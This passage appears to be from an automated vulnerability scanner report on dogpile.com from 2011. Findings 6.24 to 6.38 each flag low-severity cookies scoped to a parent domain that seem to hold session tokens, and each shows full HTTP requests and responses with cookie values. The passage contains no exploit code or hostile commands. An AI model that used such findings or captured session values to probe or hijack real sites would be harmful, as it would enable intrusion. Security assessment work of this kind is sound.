Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:50 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:50 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:49 GMT
Connection: close
Content-Length: 41769
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.24. http://www.dogpile.com/dogpile_other/ws/faq/_iceUrlFlag=11

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/faq/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/faq/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
Referer: http://www.dogpile.com/dogpile_other/ws/index
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3792213258.20480.0000+cacheId+ms20:1301676964559; wsRecent=Go+Daddy+CEO+Elephant,Web,Relevance,&MLB+Schedule,Web,Relevance,; wsViewRecent=1; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=f1e07d8163f9435e87f8c16a3af0cb01&ActionId=859dec9ca7a74a60921ac16a3af0cb01&CookieDomain=.dogpile.com; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:55:52 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=fabc047e90564b3caea8c16a3af0cb01&ActionId=c6139e801eee4175a160c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:16:15 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:15 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:56:15 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:56:15 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 64601

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.25. http://www.dogpile.com/dogpile_other/ws/faq/qcat=Images/_iceUrlFlag=11

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/faq/qcat=Images/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/faq/qcat=Images/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=302e17dfa32741629beac16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:30 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:30 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:30 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:30 GMT
Connection: close
Content-Length: 64282
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.26. http://www.dogpile.com/dogpile_other/ws/faq/qcat=News/_iceUrlFlag=11

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/faq/qcat=News/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/faq/qcat=News/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=8d4c05bb90314dba98a5c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:32 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:32 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:32 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:32 GMT
Connection: close
Content-Length: 64258
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.27. http://www.dogpile.com/dogpile_other/ws/faq/qcat=Video/_iceUrlFlag=11

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/faq/qcat=Video/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/faq/qcat=Video/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=5b79a7352bbb4726a052c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:31 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:31 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:31 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:31 GMT
Connection: close
Content-Length: 64276
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.28. http://www.dogpile.com/dogpile_other/ws/faq/qcat=Web/_iceUrlFlag=11

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/faq/qcat=Web/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/faq/qcat=Web/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=8e6e2554f391469f90c0c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:29 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:29 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:29 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:29 GMT
Connection: close
Content-Length: 64601
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.29. http://www.dogpile.com/dogpile_other/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=d19fcdce85e94a39b89bc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:15 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:15 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:15 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:14 GMT
Connection: close
Content-Length: 64599
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.30. http://www.dogpile.com/dogpile_other/ws/index

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/index

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/index HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
Referer: http://dogpile.com/dogpile/ws/index/qcat=wp/_iceUrlFlag=11?_IceUrl=true
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=bc343352182e410c9000c16a3af0cb01&ActionId=91f95e6548a4490186bdc16a3af0cb01&CookieDomain=.dogpile.com; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:55:57 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=91f95e6548a4490186bdc16a3af0cb01&ActionId=62fda6b6aa3440d49bc7c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:15:44 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:55:44 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:55:44 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:55:44 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 45935

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.31. http://www.dogpile.com/dogpile_other/ws/index/_iceUrlFlag=11

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/index/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/index/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=58f66cc309544e4c8136c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:17:47 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:47 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:57:47 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:57:47 GMT
Connection: close
Content-Length: 45947
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.32. http://www.dogpile.com/dogpile_other/ws/index/qcat=Images/_iceUrlFlag=11

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/index/qcat=Images/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/index/qcat=Images/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=48a161ef0c404dfb82c8c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:17:52 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:52 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:57:52 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:57:51 GMT
Connection: close
Content-Length: 45608
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.33. http://www.dogpile.com/dogpile_other/ws/index/qcat=News/_iceUrlFlag=11

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/index/qcat=News/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/index/qcat=News/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=191540b0b4b6493e9fedc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:17:39 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:39 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:57:39 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:57:38 GMT
Connection: close
Content-Length: 45626
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.34. http://www.dogpile.com/dogpile_other/ws/index/qcat=Video/_iceUrlFlag=11

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/index/qcat=Video/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/index/qcat=Video/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=81608220bc3644438a64c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:17:38 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:38 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:57:38 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:57:38 GMT
Connection: close
Content-Length: 45626
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.35. http://www.dogpile.com/dogpile_other/ws/index/qcat=Web/_iceUrlFlag=11

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/index/qcat=Web/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/index/qcat=Web/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=f9207591fc7a45ddb5a6c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:17:51 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:51 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:57:51 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:57:51 GMT
Connection: close
Content-Length: 45927
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.36. http://www.dogpile.com/dogpile_other/ws/index/qcat=wp/_iceUrlFlag=11

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/index/qcat=wp/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/index/qcat=wp/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=a2dfd4c239b0441ea9d6c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:17:46 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:46 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:57:46 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:57:45 GMT
Connection: close
Content-Length: 31901
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.37. http://www.dogpile.com/dogpile_other/ws/index/qcat=yp/_iceUrlFlag=11

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/index/qcat=yp/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/index/qcat=yp/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=b2ec7d68211642c28148c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:17:56 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:56 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:57:56 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:57:56 GMT
Connection: close
Content-Length: 32496
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.38. http://www.dogpile.com/dogpile_other/ws/metasearch/rfcid=1384/rfcp=left/_iceUrlFlag=11

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/metasearch/rfcid=1384/rfcp=left/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/metasearch/rfcid=1384/rfcp=left/_iceUrlFlag=11 HTTP/1.1
